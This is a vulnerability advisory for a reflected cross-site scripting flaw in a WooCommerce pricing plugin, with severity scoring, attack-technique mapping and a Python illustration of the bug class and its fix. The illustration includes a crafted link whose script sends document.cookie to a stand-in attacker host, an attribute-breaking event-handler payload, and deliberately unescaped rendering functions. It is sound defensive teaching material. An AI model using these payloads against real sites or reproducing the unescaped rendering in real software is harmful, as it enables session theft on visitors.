CVE-2025-24632
Published: 31 January 2025
Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in algol.plus Advanced Dynamic Pricing for WooCommerce allows Reflected XSS. This issue affects Advanced Dynamic Pricing for WooCommerce: all versions up to and including 4.9.0.
Security Summary
CVE-2025-24632 is an Improper Neutralization of Input During Web Page Generation vulnerability, enabling Reflected Cross-site Scripting (XSS) as classified under CWE-79. It affects the Advanced Dynamic Pricing for WooCommerce WordPress plugin by algol.plus, with the issue present in all versions up to and including 4.9.0. The vulnerability carries a CVSS v3.1 base score of 7.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L), indicating high severity due to its network accessibility and scope change.
Attackers can exploit this vulnerability remotely over the network with low complexity and no privileges required, though it demands user interaction such as visiting a maliciously crafted link or page. Exploitation allows injection of malicious scripts into reflected content on the site, which then run in the victim's browser with the origin of the affected site, potentially enabling theft of session cookies (those not flagged HttpOnly; a script cannot read an HttpOnly cookie but can still issue requests with the victim's session), keystroke logging, or other client-side attacks, with low but cross-scope impacts to confidentiality, integrity, and availability.
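The CWE-79 pattern behind this class of bug, as an added illustration that is not the plugin's code: a request value reflected into HTML unescaped, next to the same output with the value neutralized. The parameter name `q`, the URL, the attacker host and the payloads are constructed for the example; the advisory does not name the plugin's actual reflecting parameter. The half-fixed renderer is included because encoding only angle brackets is a common incomplete fix that still leaves the attribute context open. WordPress's in-project equivalents of `html.escape` are `esc_attr()` for attribute values and `esc_html()` for text content.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed crafted link of the kind the advisory describes (hypothetical
# parameter "q" and hypothetical hosts; not a real exploit for the plugin).
CRAFTED_URL = (
    "https://shop.example/?q=%22%3E%3Cscript%3E"
    "document.location%3D%27https://attacker.example/c%3F%27%2Bdocument.cookie"
    "%3C/script%3E"
)

# Constructed payload that needs no angle brackets: it closes the value="..."
# attribute and adds an event handler instead of a script element.
ATTR_PAYLOAD = '" onfocus="alert(1)" autofocus="'


def query_param(url, name):
    """Decode one query-string parameter the way the server sees it."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_vulnerable(q):
    """CWE-79: the request value is written into two HTML contexts unescaped."""
    return '<input name="q" value="%s"><p>Results for %s</p>' % (q, q)


def render_half_fixed(q):
    """Incomplete fix: only < and > are encoded. Text-node injection is stopped,
    but a double quote still terminates the attribute value."""
    partly = q.replace("<", "&lt;").replace(">", "&gt;")
    return '<input name="q" value="%s"><p>Results for %s</p>' % (partly, partly)


def render_fixed(q):
    """Neutralize on output. html.escape(quote=True) encodes & < > " and ',
    which covers both the quoted-attribute and the text-node context used here."""
    safe = html.escape(q, quote=True)
    return '<input name="q" value="%s">' % safe + "<p>Results for %s</p>" % safe


class InjectionFinder(HTMLParser):
    """Counts script elements and collects on* attribute names as the browser's
    parser would see them, rather than string-matching the raw markup."""

    def __init__(self):
        super().__init__()
        self.scripts = 0
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1
        self.handlers += [name for name, _ in attrs if name.startswith("on")]


def injected(page):
    """Report what executable content the rendered page ended up containing."""
    finder = InjectionFinder()
    finder.feed(page)
    finder.close()
    return {"scripts": finder.scripts, "handlers": finder.handlers}


if __name__ == "__main__":
    q = query_param(CRAFTED_URL, "q")
    print("vulnerable :", injected(render_vulnerable(q)))
    print("fixed      :", injected(render_fixed(q)))
    print("half-fixed :", injected(render_half_fixed(ATTR_PAYLOAD)))
    print("fixed      :", injected(render_fixed(ATTR_PAYLOAD)))
```

The check parses the rendered page with `html.parser` instead of grepping for `<script`, because an escaped payload still contains the literal text `onfocus=` inside the attribute value; only a parser tells apart a quoted string from a real attribute, which is the same distinction the victim's browser makes.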
The Patchstack advisory (https://patchstack.com/database/Wordpress/Plugin/advanced-dynamic-pricing-for-woocommerce/vulnerability/wordpress-advanced-dynamic-pricing-for-woocommerce-plugin-4-9-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve) documents the Reflected XSS issue in Advanced Dynamic Pricing for WooCommerce version 4.9.0 and provides vulnerability details for WordPress site administrators.
Details
- CWE(s): CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
MITRE ATT&CK Enterprise Techniques
- T1659 Content Injection
- T1185 Browser Session Hijacking
- T1539 Steal Web Session Cookie
- T1056.001 Input Capture: Keylogging
Why these techniques?
Reflected XSS directly enables content injection (T1659) through malicious script execution in the victim's browser; that script can in turn steal web session cookies (T1539) or log keystrokes (T1056.001), which supports browser session hijacking (T1185), as described in the CVE impacts.